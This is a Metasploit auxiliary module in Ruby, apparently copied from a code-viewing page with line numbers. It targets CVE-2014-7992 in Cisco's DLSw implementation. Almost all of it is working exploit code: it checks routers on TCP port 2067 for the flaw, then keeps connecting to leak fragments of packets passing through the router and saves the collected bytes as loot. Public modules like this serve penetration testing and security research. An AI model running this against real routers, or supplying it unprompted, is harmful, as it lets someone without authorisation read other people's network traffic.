Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'socket'
7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Auxiliary::Scanner
11
  include Msf::Auxiliary::Report
12

13
  def initialize
14
    super(
15
      'Name'           => 'Cisco DLSw Information Disclosure Scanner',
16
      'Description'    => %q(
17
        This module implements the DLSw information disclosure retrieval. There
18
        is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains
19
        that allows an unauthenticated remote attacker to retrieve the partial
20
        contents of packets traversing a Cisco router with DLSw configured
21
        and active.
22
      ),
23
      'Author'         => [
24
        'Tate Hansen', # Vulnerability discovery
25
        'John McLeod', # Vulnerability discovery
26
        'Kyle Rainey' # Built lab to recreate vulnerability and help test
27
      ],
28
      'References'     =>
29
        [
30
          ['CVE', '2014-7992'],
31
          ['URL', 'https://github.com/tt5555/dlsw_exploit']
32
        ],
33
      'DisclosureDate' => 'Nov 17 2014',
34
      'License'        => MSF_LICENSE
35
    )
36

37
    register_options(
38
      [
39
        Opt::RPORT(2067),
40
        OptInt.new('LEAK_AMOUNT', [true, 'The number of bytes to store before shutting down.', 1024])
41
      ])
42
  end
43

44
  def get_response(size = 72)
45
    connect
46
    response = sock.get_once(size)
47
    disconnect
48
    response
49
  end
50

51
  # Called when using check
52
  def check_host(_ip)
53
    print_status("Checking for DLSw information disclosure (CVE-2014-7992)")
54
    response = get_response
55

56
    if response.blank?
57
      vprint_status("No response")
58
      Exploit::CheckCode::Safe
59
    elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"
60
      vprint_good("Detected DLSw protocol")
61
      report_service(
62
        host: rhost,
63
        port: rport,
64
        proto: 'tcp',
65
        name: 'dlsw'
66
      )
67
      # TODO: check that response has something that truly indicates it is vulnerable
68
      # and not simply that it responded
69
      unless response[18..72].scan(/\x00/).length == 54
70
        print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes")
71
        report_vuln(
72
          host: rhost,
73
          port: rport,
74
          name: name,
75
          refs: references,
76
          info: "Module #{fullname} collected #{response.length} bytes"
77
        )
78
        Exploit::CheckCode::Vulnerable
79
      end
80
    else
81
      vprint_status("#{response.size}-byte response didn't contain any leaked data")
82
      Exploit::CheckCode::Safe
83
    end
84
  end
85

86
  # Main method
87
  def run_host(ip)
88
    return unless check_host(ip) == Exploit::CheckCode::Vulnerable
89

90
    dlsw_data = ''
91
    until dlsw_data.length > datastore['LEAK_AMOUNT']
92
      response = get_response
93
      dlsw_data << response[18..72] unless response.blank?
94
    end
95
    loot_and_report(dlsw_data)
96
  end
97

98
  def loot_and_report(dlsw_leak)
99
    path = store_loot(
100
      'dlsw.packet.contents',
101
      'application/octet-stream',
102
      rhost,
103
      dlsw_leak,
104
      'DLSw_leaked_data',
105
      'DLSw packet memory leak'
106
    )
107
    print_status("DLSw leaked data stored in #{path}")
108
  end
109
end
110

111